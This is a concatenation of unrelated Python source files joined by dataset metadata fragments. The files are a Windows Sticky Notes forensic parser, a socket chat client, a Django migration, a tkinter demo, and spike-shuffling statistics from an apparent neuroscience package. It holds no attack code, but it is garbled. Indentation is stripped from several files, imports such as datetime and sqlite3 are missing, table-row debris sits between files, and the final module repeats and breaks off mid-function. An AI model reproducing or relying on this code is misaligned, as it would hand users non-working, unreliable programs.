import olefile
import re
"""
testcase
1.[win7]_가상환경_StickyNotes.snt
"""
class Sticky_Note_Information:
par_id = ''
case_id = ''
evd_id = ''
note_id = ''
type = ''
content = ''
activated = ''
createdtime = ''
modifiedtime = ''
created_at_list = ["CreatedAt"]
updated_at_list = ["UpdatedAt"]
media_file_path_list = ["LocalFileRelativePath"]
media_mime_type_list = ["MimeType"]
media_id_list = ["Id"]
media_parent_id_list = ["ParentId"]
note_text_list = ["Text"]
note_is_open_list = ["IsOpen"]
note_id_list = ["Id"]
media_column_name_list = ["LocalFileRelativePath", "MimeType", "Id", "ParentId", "CreatedAt", "UpdatedAt"]
note_column_name_list = ["Text", "IsOpen", "Id", "CreatedAt", "UpdatedAt"]
our_db_column_name = ["Note_Id", "Type", "Content", "Activated", "CreatedTime", "ModifiedTime"]
def Parse2Type(data):
return data
def Parse2FilePath(data):
    removable_text = "ms-appdata:///local/media/"
    # Fall back to the original string if the expected prefix is not present
    result = data
    if removable_text in data:
        result = data.replace(removable_text, "")
    return result
def Parse2TimeStamp(data):
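    # The input is presumably a Windows/OLE-style tick count: 100-nanosecond units
    # counted from 0001-01-01. Dividing by 10,000,000 converts ticks to seconds and
    # subtracting 62,135,596,800 (the seconds between 0001-01-01 and 1970-01-01)
    # shifts the value onto the Unix epoch before it is formatted as ISO-8601.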
if data == 0:
return 0
return datetime.datetime.fromtimestamp(data / 10000000 - 62135596800).strftime('%Y-%m-%dT%H:%M:%S.%f')+'Z'
def Parse2Active(data):
if data == 1:
return "Open"
else:
return "Close"
def Parse2Id(data):
return data
def Parse2Text(data):
    # Regular expression for the note id: \id=[a-zA-Z0-9_]{8}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{12}
p = re.compile("\\\\id=[a-zA-Z0-9_]{8}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{12}")
data = re.sub(p, "", data)
return data
def saveDataInDict(our_db, output_column_name, data):
our_db[output_column_name] = data
def ParseColumn(temp_result_dictionary, data, column_name, sep):
if sep == "Media":
saveDataInDict(temp_result_dictionary, "Activated", "NULL")
if column_name in media_file_path_list:
saveDataInDict(temp_result_dictionary, "Content", Parse2FilePath(data))
elif column_name in media_mime_type_list:
saveDataInDict(temp_result_dictionary, "Type", Parse2Type(data))
# elif column_name in media_id_list:
# temp_result_dictionary["Media_Id"] = Parse2Id(data)
elif column_name in media_parent_id_list:
            # Store the ParentId as Note_Id so that media (image) rows can be linked to their text notes in the results
saveDataInDict(temp_result_dictionary, "Note_Id", Parse2Id(data))
elif column_name in created_at_list:
saveDataInDict(temp_result_dictionary, "CreatedTime", Parse2TimeStamp(data))
elif column_name in updated_at_list:
saveDataInDict(temp_result_dictionary, "ModifiedTime", Parse2TimeStamp(data))
elif sep == "Note":
saveDataInDict(temp_result_dictionary, "Type", "Text")
if column_name in note_text_list:
saveDataInDict(temp_result_dictionary, "Content", Parse2Text(data))
elif column_name in note_is_open_list:
saveDataInDict(temp_result_dictionary, "Activated", Parse2Active(data))
elif column_name in note_id_list:
saveDataInDict(temp_result_dictionary, "Note_Id", Parse2Id(data))
elif column_name in created_at_list:
saveDataInDict(temp_result_dictionary, "CreatedTime", Parse2TimeStamp(data))
elif column_name in updated_at_list:
saveDataInDict(temp_result_dictionary, "ModifiedTime", Parse2TimeStamp(data))
def convertSntResult(id, dictionary):
our_db = dict()
saveDataInDict(our_db, "Type", "text")
saveDataInDict(our_db, "Activated", "NULL")
saveDataInDict(our_db, "Note_Id", id)
saveDataInDict(our_db, "CreatedTime", dictionary["created_time"])
saveDataInDict(our_db, "ModifiedTime", dictionary["modified_time"])
saveDataInDict(our_db, "Content", dictionary["content"])
result = convertDictionaryToList(our_db)
return result
def convertDictionaryToList(dict):
result = list()
for output_column_name in our_db_column_name:
result.append(dict[output_column_name])
return result
def divide2column(row, column_name_list, sep):
result_sql = dict()
for i in range(0, len(column_name_list)):
ParseColumn(result_sql, row[i], column_name_list[i], sep)
result = convertDictionaryToList(result_sql)
return result
def ParseSnt(file):
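    # A legacy StickyNotes.snt file is an OLE compound document. Based on the checks
    # below, each note is assumed to live in its own storage (a name containing three
    # '-' characters) whose stream "3" holds the note text as UTF-16; the storage's
    # creation and modification times are used as the note's timestamps.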
ole = olefile.OleFileIO(file)
result = dict()
for stream in ole.listdir():
if stream[0].count("-") == 3 and stream[1] == "3":
created_time = ole.getctime(stream[0])
modified_time = ole.getmtime(stream[0])
content = ole.openstream((stream)).read().decode("utf-16").rstrip("\u0000")
result[stream[0]] = dict()
result_stream = result[stream[0]]
result_stream["created_time"] = str(created_time)
result_stream["modified_time"] = str(modified_time)
result_stream["content"] = content
return result
def SaveDataInDict(our_db, output_column_name, data):
    our_db[output_column_name] = data
def STICKYNOTE(filename):
result = []
note_count = 0
'''
basepath = os.getcwd()
#filename = "[win10]_1809_가상환경_plum.sqlite"
target_file = basepath + "//" + filename
'''
target_file = filename
# olefile signature = 0x D0 CF 11 E0 A1 B1 1A E1
# sqlite signature = 0x 53 51 4C 69 74 65 20 66 6F 72 6D 61 74 20 33 00
if not olefile.isOleFile(target_file):
conn = sqlite3.connect(target_file)
cur = conn.cursor()
sql_command = "SELECT "
for column_name in note_column_name_list:
sql_command += column_name
if column_name is not note_column_name_list[-1]:
sql_command += ', '
sql_command += " FROM Note"
note_data = cur.execute(sql_command)
for row in note_data:
note_data_row = divide2column(row, note_column_name_list, "Note")
sticky_note_information = Sticky_Note_Information()
result.append(sticky_note_information)
result[note_count].note_id = note_data_row[0]
result[note_count].type = note_data_row[1]
result[note_count].content = note_data_row[2]
result[note_count].activated = note_data_row[3]
result[note_count].createdtime = note_data_row[4]
result[note_count].modifiedtime = note_data_row[5]
note_count = note_count + 1
sql_command = "SELECT "
for column_name in media_column_name_list:
sql_command += column_name
if column_name is not media_column_name_list[-1]:
sql_command += ', '
sql_command += " FROM Media"
media_data = cur.execute(sql_command)
for row in media_data:
media_data_row = divide2column(row, media_column_name_list, "Media")
sticky_note_information = Sticky_Note_Information()
result.append(sticky_note_information)
result[note_count].note_id = media_data_row[0]
result[note_count].type = media_data_row[1]
result[note_count].content = ''.join(media_data_row[2].split())
result[note_count].activated = media_data_row[3]
result[note_count].createdtime = media_data_row[4]
result[note_count].modifiedtime = media_data_row[5]
note_count = note_count + 1
elif olefile.isOleFile(target_file):
result_snt = ParseSnt(target_file)
for key, value in result_snt.items():
rs = convertSntResult(key, value)
result.append(rs)
return result | ko | 0.155269 | # -*- coding:utf-8 -*- testcase 1.[win7]_가상환경_StickyNotes.snt # id의 정규표현식 : \id=[a-zA-Z0-9_]{8}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{12} # elif column_name in media_id_list: # temp_result_dictionary["Media_Id"] = Parse2Id(data) # 결과 값에서 Text와 image를 엮기 위해서 ParentId를 Id로 바꿔줌 basepath = os.getcwd() #filename = "[win10]_1809_가상환경_plum.sqlite" target_file = basepath + "//" + filename # olefile signature = 0x D0 CF 11 E0 A1 B1 1A E1 # sqlite signature = 0x 53 51 4C 69 74 65 20 66 6F 72 6D 61 74 20 33 00 | 2.547248 | 3 |
com/client.py | clllllllllc/unicorn-pancake | 0 | 6632485 | import threading
import socket
host = '10.173.16.225'
port = 55554
nickname = input("Please Enter Nickname: ")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
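# Application-level handshake assumed by this client: after connecting, the server
# sends the literal string "nick" to request an identifier, the client answers with
# its nickname, and any other message received is treated as chat text to print.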
def receive():
while True:
try:
message = client.recv(1024).decode('ascii')
if message == "nick":
client.send(nickname.encode('ascii'))
else:
print(message)
except:
print("error occurred")
client.close()
break
def write():
while True:
message = f'{nickname}: {input("")}'
client.send(message.encode('ascii'))
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
| import threading
import socket
host = '10.173.16.225'
port = 55554
nickname = input("Please Enter Nickname: ")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
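# Application-level handshake assumed by this client: after connecting, the server
# sends the literal string "nick" to request an identifier, the client answers with
# its nickname, and any other message received is treated as chat text to print.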
def receive():
while True:
try:
message = client.recv(1024).decode('ascii')
if message == "nick":
client.send(nickname.encode('ascii'))
else:
print(message)
except:
print("error occurred")
client.close()
break
def write():
while True:
message = f'{nickname}: {input("")}'
client.send(message.encode('ascii'))
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
| none | 1 | 3.004477 | 3 |
|
conf/migrations/0001_initial.py | abingprogrammer/OnlineJudge-master | 0 | 6632486 | <reponame>abingprogrammer/OnlineJudge-master
# Generated by Django 2.0.1 on 2018-04-26 15:47
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='JudgeServer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('hostname', models.CharField(max_length=128)),
('ip', models.CharField(blank=True, max_length=32, null=True)),
('judger_version', models.CharField(max_length=32)),
('cpu_core', models.IntegerField()),
('memory_usage', models.FloatField()),
('cpu_usage', models.FloatField()),
('last_heartbeat', models.DateTimeField()),
('create_time', models.DateTimeField(auto_now_add=True)),
('task_number', models.IntegerField(default=0)),
('service_url', models.CharField(blank=True, max_length=256, null=True)),
('is_disabled', models.BooleanField(default=False)),
],
options={
'db_table': 'judge_server',
},
),
]
| # Generated by Django 2.0.1 on 2018-04-26 15:47
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='JudgeServer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('hostname', models.CharField(max_length=128)),
('ip', models.CharField(blank=True, max_length=32, null=True)),
('judger_version', models.CharField(max_length=32)),
('cpu_core', models.IntegerField()),
('memory_usage', models.FloatField()),
('cpu_usage', models.FloatField()),
('last_heartbeat', models.DateTimeField()),
('create_time', models.DateTimeField(auto_now_add=True)),
('task_number', models.IntegerField(default=0)),
('service_url', models.CharField(blank=True, max_length=256, null=True)),
('is_disabled', models.BooleanField(default=False)),
],
options={
'db_table': 'judge_server',
},
),
] | en | 0.791378 | # Generated by Django 2.0.1 on 2018-04-26 15:47 | 1.87201 | 2 |
Project1.py | varnaugj/Python-Early-Codes | 0 | 6632487 |
from tkinter import *
import tkinter as tk
window = tk.Tk()
greeting = tk.Label(text="Test 123")
greeting.pack()
def returnEntry(arg=None):
name = myEntry.get()
resultLabel.config(text= name)
myEntry.delete(0,END)
myEntry = tk.Entry(width=20)
myEntry.focus()
myEntry.bind("<Return>", returnEntry)
myEntry.pack()
button = tk.Button(text="Yeet me!", command=returnEntry, width=25, height=5)
button.pack(fill=X)
resultLabel = tk.Label(text="")
resultLabel.pack(fill=X)
window.mainloop()
#val = input("Enter Text here: ")
#print(val)
#entry = tk.Entry(fg="black",bg="white", width=50)
#entry.pack()
|
from tkinter import *
import tkinter as tk
window = tk.Tk()
greeting = tk.Label(text="Test 123")
greeting.pack()
def returnEntry(arg=None):
name = myEntry.get()
resultLabel.config(text= name)
myEntry.delete(0,END)
myEntry = tk.Entry(width=20)
myEntry.focus()
myEntry.bind("<Return>", returnEntry)
myEntry.pack()
button = tk.Button(text="Yeet me!", command=returnEntry, width=25, height=5)
button.pack(fill=X)
resultLabel = tk.Label(text="")
resultLabel.pack(fill=X)
window.mainloop()
#val = input("Enter Text here: ")
#print(val)
#entry = tk.Entry(fg="black",bg="white", width=50)
#entry.pack()
| en | 0.277602 | #val = input("Enter Text here: ") #print(val) #entry = tk.Entry(fg="black",bg="white", width=50) #entry.pack() | 3.9277 | 4 |
opendirection/stats/tools.py | adamltyson/opendirection | 0 | 6632488 | <reponame>adamltyson/opendirection
import logging
import random
import numpy as np
import multiprocessing as mp
from scipy.stats import percentileofscore
from imlib.general.system import sanitize_num_processes
import opendirection.spikes.tools as spike_tools
import opendirection.tools.tools as tools
MIN_PROCESSES = 1
def apply_random_sign(number):
sign = 1 if random.random() < 0.5 else -1
return sign * number
def generic_parallel_shuffle_test(
specific_test,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
two_lists=False,
):
# Define an output queue
output = mp.Queue()
args = (output, *args) # add output to args
# array of shuffle magnitudes to go through
shuffle_dists = np.random.randint(
min_shuffle_dist, high=max_shuffle_dist, size=num_iterations
)
# split up the shuffle magnitudes into blocks for each process
shuffle_dist_blocks = np.array_split(shuffle_dists, num_processes)
# Setup a list of processes
processes = [
mp.Process(
target=specific_test, args=(shuffle_dist_blocks[process], *args)
)
for process in range(0, num_processes)
]
# Run processes
for p in processes:
p.start()
# Exit the completed processes
for p in processes:
p.join()
if two_lists:
# Get process results from the output queue
output_tmp = [output.get() for p in processes]
all_vals_1 = output_tmp[0][0]
all_vals_2 = output_tmp[0][1]
for i in range(1, len(output_tmp)):
all_vals_1 = np.append(all_vals_1, output_tmp[i][0])
all_vals_2 = np.append(all_vals_2, output_tmp[i][1])
return all_vals_1, all_vals_2
else:
# Get process results from the output queue
vals_tmp = [output.get() for p in processes]
all_vals = vals_tmp[0]
for i in range(1, len(vals_tmp)):
all_vals = np.append(all_vals, vals_tmp[i])
return all_vals
def run_hd_shuffled_stats(
vec_length_real,
stability_index_real,
head_angles_all,
spike_train,
head_angle_sampling,
min_shuffle_dist_time=20,
max_shuffle_dist_time=0,
camera_frames_per_sec=None,
bin_spacing=0.105,
num_iterations=1000,
threshold=1,
smooth_width=None,
parallel=False,
num_processes=10,
):
"""
:param vec_length_real: "Real" (i.e. unshuffled) mean vector length
:param head_angles_all: Head angle at bin (wrapped)
:param spike_train: Number of spikes per bin
:param head_angle_sampling: Relative occupancy of bins
:param camera_frames_per_sec: Calibration
:param bin_spacing: In radians
:param num_iterations: How many shuffling iterations (default: 1000)
:param threshold: Number of spikes per bin for it to be
classed as active (default: 1)
:param bool parallel: If true, split up the shuffle iterations across
multiple CPU cores.
:param int num_processes: If 'parallel', how many processes to use.
Default: 10
:return:
"""
# todo: combine with opendirection.spikes.tools.get_direction_per_spike
head_angles_all = np.array(np.deg2rad(head_angles_all))
spike_train = np.array(spike_train)
parallel = sanitize_num_processes(
num_processes, MIN_PROCESSES, parallel=parallel
)
min_shuffle_dist = tools.shuffle_distances_in_units(
min_shuffle_dist_time, camera_frames_per_sec, spike_train
)
if max_shuffle_dist_time == 0:
max_shuffle_dist = len(spike_train) - min_shuffle_dist
else:
max_shuffle_dist = tools.shuffle_distances_in_units(
max_shuffle_dist_time, camera_frames_per_sec, spike_train
)
angles_w_firing = head_angles_all[(spike_train >= threshold)]
firing_weighting = spike_train[(spike_train >= threshold)]
spikes_per_bin, bin_centers = spike_tools.get_spike_hist_single(
np.rad2deg(angles_w_firing),
firing_weighting,
np.rad2deg(bin_spacing),
head_angle_sampling,
)
logging.debug("Running random shuffling")
if parallel:
args = (
spike_train,
bin_centers,
bin_spacing,
head_angles_all,
head_angle_sampling,
threshold,
camera_frames_per_sec,
smooth_width,
)
(
vec_length_shuffled,
stability_index_shuffled,
) = generic_parallel_shuffle_test(
hd_shuffle_parallel,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
two_lists=True,
)
else:
vec_length_shuffled = np.empty(num_iterations)
stability_index_shuffled = np.empty(num_iterations)
for iteration in range(0, num_iterations):
logging.debug("Iteration: " + str(iteration))
rand_shuffle = apply_random_sign(
np.random.randint(min_shuffle_dist, high=max_shuffle_dist)
)
spikes_shuffled = np.roll(spike_train, rand_shuffle)
(
vec_length_shuffled[iteration],
stability_index_shuffled[iteration],
) = spike_tools.mean_vec_length_and_stability(
head_angles_all,
spikes_shuffled,
bin_centers,
bin_spacing,
head_angle_sampling,
camera_frames_per_sec,
smooth_width=smooth_width,
threshold=threshold,
)
vec_length_percentile = percentileofscore(
vec_length_shuffled, vec_length_real
)
stability_index_percentile = percentileofscore(
abs(stability_index_shuffled), abs(stability_index_real)
)
return vec_length_percentile, stability_index_percentile
def hd_shuffle_parallel(
shuffle_dists,
output,
spike_train,
bin_centers,
bin_spacing,
head_angles_all,
head_angle_sampling,
threshold,
camera_frames_per_sec,
smooth_width,
):
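    # Worker used by generic_parallel_shuffle_test: each process takes a block of
    # shuffle offsets, circularly shifts the spike train by each offset (with a
    # random sign), recomputes the tuning metrics, and puts its two result arrays
    # on the shared queue in a single call, so the parent collects one item per process.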
vec_lengths = []
stability_indices = []
for i in range(0, len(shuffle_dists)):
spikes_shuffled = np.roll(
spike_train, apply_random_sign(shuffle_dists[i])
)
(
vec_length,
stability_index,
) = spike_tools.mean_vec_length_and_stability(
head_angles_all,
spikes_shuffled,
bin_centers,
bin_spacing,
head_angle_sampling,
camera_frames_per_sec,
smooth_width=smooth_width,
threshold=threshold,
)
vec_lengths.append(vec_length)
stability_indices.append(stability_index)
vec_lengths = np.array(vec_lengths)
stability_indices = np.array(stability_indices)
output.put([vec_lengths, stability_indices])
def is_ahv_cell_sig(
pearson_r_neg_real,
pearson_r_pos_real,
bin_centers,
spike_train,
ahv_vals_timecourse,
bin_times_in_range,
min_shuffle_dist_time=20,
max_shuffle_dist_time=0,
camera_frames_per_sec=None,
num_iterations=1000,
num_processes=10,
correlation_mag_force=True,
parallel=False,
):
shuffled_binned_data = []
parallel = sanitize_num_processes(
num_processes, MIN_PROCESSES, parallel=parallel
)
min_shuffle_dist = tools.shuffle_distances_in_units(
min_shuffle_dist_time, camera_frames_per_sec, spike_train
)
if max_shuffle_dist_time == 0:
max_shuffle_dist = len(spike_train) - min_shuffle_dist
else:
max_shuffle_dist = tools.shuffle_distances_in_units(
max_shuffle_dist_time, camera_frames_per_sec, spike_train
)
logging.debug("Running random shuffling")
if parallel:
args = (
spike_train,
bin_centers,
ahv_vals_timecourse,
bin_times_in_range,
)
pearson_r_neg, pearson_r_pos = generic_parallel_shuffle_test(
ahv_shuffle_parallel,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
two_lists=True,
)
else: # if parallel doesn't work
logging.warning("Running serial shuffling")
pearson_r_neg = np.empty(num_iterations)
pearson_r_pos = np.empty(num_iterations)
for iteration in range(0, num_iterations):
logging.debug("Iteration: " + str(iteration))
rand_shuffle = apply_random_sign(
np.random.randint(min_shuffle_dist, high=max_shuffle_dist)
)
spikes_shuffled = np.roll(spike_train, rand_shuffle)
(
(pearson_r_neg[iteration], pearson_r_pos[iteration]),
_shuffled_binned_data,
) = spike_tools.get_correlations(
spikes_shuffled,
bin_centers,
ahv_vals_timecourse,
bin_times_in_range,
pos_neg_separate=True,
)
shuffled_binned_data.append(_shuffled_binned_data)
    # if we only care about the magnitude of the correlation
if correlation_mag_force:
pearson_r_neg = abs(pearson_r_neg)
pearson_r_pos = abs(pearson_r_pos)
pearson_r_neg_real = abs(pearson_r_neg_real)
pearson_r_pos_real = abs(pearson_r_pos_real)
real_percentile_neg = percentileofscore(pearson_r_neg, pearson_r_neg_real)
real_percentile_pos = percentileofscore(pearson_r_pos, pearson_r_pos_real)
return real_percentile_neg, real_percentile_pos, shuffled_binned_data
def ahv_shuffle_parallel(
shuffle_dists,
output,
spike_train,
bin_centers,
ahv_vals_timecourse,
bin_times_in_range,
):
pearson_r_neg = []
pearson_r_pos = []
for i in range(0, len(shuffle_dists)):
spikes_shuffled = np.roll(
spike_train, apply_random_sign(shuffle_dists[i])
)
(r_neg, r_pos), shuffled_binned_data = spike_tools.get_correlations(
spikes_shuffled,
bin_centers,
ahv_vals_timecourse,
bin_times_in_range,
pos_neg_separate=True,
)
pearson_r_neg.append(r_neg)
pearson_r_pos.append(r_pos)
pearson_r_neg = np.array(pearson_r_neg)
pearson_r_pos = np.array(pearson_r_pos)
output.put([pearson_r_neg, pearson_r_pos])
def is_velocity_cell_sig(
pearson_real,
bin_centers,
spike_train,
velocity_vals_timecourse,
bin_times_in_range,
min_shuffle_dist_time=20,
max_shuffle_dist_time=0,
camera_frames_per_sec=None,
num_iterations=1000,
num_processes=10,
parallel=False,
correlation_mag_force=False,
):
shuffled_binned_data = []
parallel = sanitize_num_processes(
num_processes, MIN_PROCESSES, parallel=parallel
)
min_shuffle_dist = tools.shuffle_distances_in_units(
min_shuffle_dist_time, camera_frames_per_sec, spike_train
)
if max_shuffle_dist_time == 0:
max_shuffle_dist = len(spike_train) - min_shuffle_dist
else:
max_shuffle_dist = tools.shuffle_distances_in_units(
max_shuffle_dist_time, camera_frames_per_sec, spike_train
)
logging.debug("Running random shuffling")
if parallel:
args = (
spike_train,
bin_centers,
velocity_vals_timecourse,
bin_times_in_range,
)
pearson = generic_parallel_shuffle_test(
velocity_shuffle_parallel,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
)
else: # if parallel doesn't work
logging.warning("Not running serial shuffling")
pearson = np.empty(num_iterations)
for iteration in range(0, num_iterations):
logging.debug("Iteration: " + str(iteration))
rand_shuffle = apply_random_sign(
np.random.randint(min_shuffle_dist, high=max_shuffle_dist)
)
spikes_shuffled = np.roll(spike_train, rand_shuffle)
(
pearson[iteration],
_shuffled_binned_data,
) = spike_tools.get_correlations(
spikes_shuffled,
bin_centers,
velocity_vals_timecourse,
bin_times_in_range,
sanitise_values=True,
)
shuffled_binned_data.append(_shuffled_binned_data)
if correlation_mag_force:
pearson = abs(pearson)
pearson_real = abs(pearson_real)
real_percentile_val = percentileofscore(pearson, pearson_real)
return real_percentile_val, shuffled_binned_data
def velocity_shuffle_parallel(
shuffle_dists,
output,
spike_train,
bin_centers,
vals_timecourse,
bin_times_in_range,
):
pearson = []
for i in range(0, len(shuffle_dists)):
spikes_shuffled = np.roll(
spike_train, apply_random_sign(shuffle_dists[i])
)
r, shuffled_binned_data = spike_tools.get_correlations(
spikes_shuffled,
bin_centers,
vals_timecourse,
bin_times_in_range,
sanitise_values=True,
)
pearson.append(r)
pearson = np.array(pearson)
output.put(pearson)
def is_place_cell_sig(
real_peak,
bin_centers,
spike_train,
x,
y,
bin_occupancy,
smoothing=None,
min_shuffle_dist_time=20,
max_shuffle_dist_time=0,
camera_frames_per_sec=None,
num_iterations=1000,
num_processes=10,
sanitise_values=True,
min_time_in_spatial_bin=0,
parallel=False,
):
parallel = sanitize_num_processes(
num_processes, MIN_PROCESSES, parallel=parallel
)
min_shuffle_dist = tools.shuffle_distances_in_units(
min_shuffle_dist_time, camera_frames_per_sec, spike_train
)
if max_shuffle_dist_time == 0:
max_shuffle_dist = len(spike_train) - min_shuffle_dist
else:
max_shuffle_dist = tools.shuffle_distances_in_units(
max_shuffle_dist_time, camera_frames_per_sec, spike_train
)
bin_centers_x, bin_centers_y = bin_centers
bin_size = bin_centers_x[1] - bin_centers_x[0]
logging.debug("Running random shuffling")
if parallel:
args = (
spike_train,
bin_centers,
bin_size,
x,
y,
bin_occupancy,
smoothing,
sanitise_values,
min_time_in_spatial_bin,
)
peaks = generic_parallel_shuffle_test(
place_shuffle_parallel,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
)
else: # if parallel doesn't work
logging.warning("Not running parallel shuffling")
peaks = np.empty(num_iterations)
for iteration in range(0, num_iterations):
logging.debug("Iteration: " + str(iteration))
rand_shuffle = apply_random_sign(
np.random.randint(min_shuffle_dist, high=max_shuffle_dist)
)
spikes_shuffled = np.roll(spike_train, rand_shuffle)
peaks[iteration] = spike_tools.place_peak_response(
spikes_shuffled,
bin_centers,
bin_size,
x,
y,
sanitise_values=sanitise_values,
min_time_in_spatial_bin=min_time_in_spatial_bin,
smoothing=smoothing,
bin_occupancy=bin_occupancy,
)
real_percentile_val = percentileofscore(peaks, real_peak)
return real_percentile_val
def place_shuffle_parallel(
shuffle_dists,
output,
spike_train,
bin_centers,
bin_size,
x,
y,
bin_occupancy,
smoothing,
sanitise_values,
min_time_in_spatial_bin,
):
peaks = []
for i in range(0, len(shuffle_dists)):
spikes_shuffled = np.roll(
spike_train, apply_random_sign(shuffle_dists[i])
)
peak = spike_tools.place_peak_response(
spikes_shuffled,
bin_centers,
bin_size,
x,
y,
sanitise_values=sanitise_values,
min_time_in_spatial_bin=min_time_in_spatial_bin,
smoothing=smoothing,
bin_occupancy=bin_occupancy,
)
peaks.append(peak)
peaks = np.array(peaks)
output.put(peaks)
| import logging
import random
import numpy as np
import multiprocessing as mp
from scipy.stats import percentileofscore
from imlib.general.system import sanitize_num_processes
import opendirection.spikes.tools as spike_tools
import opendirection.tools.tools as tools
MIN_PROCESSES = 1
def apply_random_sign(number):
sign = 1 if random.random() < 0.5 else -1
return sign * number
def generic_parallel_shuffle_test(
specific_test,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
two_lists=False,
):
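    # `specific_test` is expected to be a worker with signature
    # (shuffle_dists, output_queue, *args) that puts its result array(s) on the
    # queue exactly once. Illustrative call (the worker and argument names below
    # are hypothetical, not defined in this module):
    #   percentiles = generic_parallel_shuffle_test(
    #       my_worker, min_shuffle_dist, max_shuffle_dist,
    #       num_iterations=1000, num_processes=4,
    #       args=(spike_train, bin_centers))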
# Define an output queue
output = mp.Queue()
args = (output, *args) # add output to args
# array of shuffle magnitudes to go through
shuffle_dists = np.random.randint(
min_shuffle_dist, high=max_shuffle_dist, size=num_iterations
)
# split up the shuffle magnitudes into blocks for each process
shuffle_dist_blocks = np.array_split(shuffle_dists, num_processes)
# Setup a list of processes
processes = [
mp.Process(
target=specific_test, args=(shuffle_dist_blocks[process], *args)
)
for process in range(0, num_processes)
]
# Run processes
for p in processes:
p.start()
# Exit the completed processes
for p in processes:
p.join()
if two_lists:
# Get process results from the output queue
output_tmp = [output.get() for p in processes]
all_vals_1 = output_tmp[0][0]
all_vals_2 = output_tmp[0][1]
for i in range(1, len(output_tmp)):
all_vals_1 = np.append(all_vals_1, output_tmp[i][0])
all_vals_2 = np.append(all_vals_2, output_tmp[i][1])
return all_vals_1, all_vals_2
else:
# Get process results from the output queue
vals_tmp = [output.get() for p in processes]
all_vals = vals_tmp[0]
for i in range(1, len(vals_tmp)):
all_vals = np.append(all_vals, vals_tmp[i])
return all_vals
def run_hd_shuffled_stats(
vec_length_real,
stability_index_real,
head_angles_all,
spike_train,
head_angle_sampling,
min_shuffle_dist_time=20,
max_shuffle_dist_time=0,
camera_frames_per_sec=None,
bin_spacing=0.105,
num_iterations=1000,
threshold=1,
smooth_width=None,
parallel=False,
num_processes=10,
):
"""
    :param vec_length_real: "Real" (i.e. unshuffled) mean vector length
    :param stability_index_real: "Real" (i.e. unshuffled) stability index
    :param head_angles_all: Head angle at bin (wrapped)
    :param spike_train: Number of spikes per bin
    :param head_angle_sampling: Relative occupancy of bins
    :param min_shuffle_dist_time: Minimum shuffle offset, in time units,
        converted to samples using camera_frames_per_sec (default: 20)
    :param max_shuffle_dist_time: Maximum shuffle offset, in the same units.
        If 0, the spike train length minus the minimum offset is used.
    :param camera_frames_per_sec: Calibration
    :param bin_spacing: In radians
    :param num_iterations: How many shuffling iterations (default: 1000)
    :param threshold: Number of spikes per bin for it to be
        classed as active (default: 1)
    :param smooth_width: Smoothing width passed through to the tuning-curve
        and stability calculation (default: None)
    :param bool parallel: If true, split up the shuffle iterations across
        multiple CPU cores.
    :param int num_processes: If 'parallel', how many processes to use.
        Default: 10
    :return: Percentile of the real mean vector length, and of the absolute
        real stability index, within their shuffled distributions
"""
# todo: combine with opendirection.spikes.tools.get_direction_per_spike
head_angles_all = np.array(np.deg2rad(head_angles_all))
spike_train = np.array(spike_train)
parallel = sanitize_num_processes(
num_processes, MIN_PROCESSES, parallel=parallel
)
min_shuffle_dist = tools.shuffle_distances_in_units(
min_shuffle_dist_time, camera_frames_per_sec, spike_train
)
if max_shuffle_dist_time == 0:
max_shuffle_dist = len(spike_train) - min_shuffle_dist
else:
max_shuffle_dist = tools.shuffle_distances_in_units(
max_shuffle_dist_time, camera_frames_per_sec, spike_train
)
angles_w_firing = head_angles_all[(spike_train >= threshold)]
firing_weighting = spike_train[(spike_train >= threshold)]
spikes_per_bin, bin_centers = spike_tools.get_spike_hist_single(
np.rad2deg(angles_w_firing),
firing_weighting,
np.rad2deg(bin_spacing),
head_angle_sampling,
)
logging.debug("Running random shuffling")
if parallel:
args = (
spike_train,
bin_centers,
bin_spacing,
head_angles_all,
head_angle_sampling,
threshold,
camera_frames_per_sec,
smooth_width,
)
(
vec_length_shuffled,
stability_index_shuffled,
) = generic_parallel_shuffle_test(
hd_shuffle_parallel,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
two_lists=True,
)
else:
vec_length_shuffled = np.empty(num_iterations)
stability_index_shuffled = np.empty(num_iterations)
for iteration in range(0, num_iterations):
logging.debug("Iteration: " + str(iteration))
rand_shuffle = apply_random_sign(
np.random.randint(min_shuffle_dist, high=max_shuffle_dist)
)
spikes_shuffled = np.roll(spike_train, rand_shuffle)
(
vec_length_shuffled[iteration],
stability_index_shuffled[iteration],
) = spike_tools.mean_vec_length_and_stability(
head_angles_all,
spikes_shuffled,
bin_centers,
bin_spacing,
head_angle_sampling,
camera_frames_per_sec,
smooth_width=smooth_width,
threshold=threshold,
)
vec_length_percentile = percentileofscore(
vec_length_shuffled, vec_length_real
)
stability_index_percentile = percentileofscore(
abs(stability_index_shuffled), abs(stability_index_real)
)
return vec_length_percentile, stability_index_percentile
def hd_shuffle_parallel(
shuffle_dists,
output,
spike_train,
bin_centers,
bin_spacing,
head_angles_all,
head_angle_sampling,
threshold,
camera_frames_per_sec,
smooth_width,
):
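    # Worker used by generic_parallel_shuffle_test: each process takes a block of
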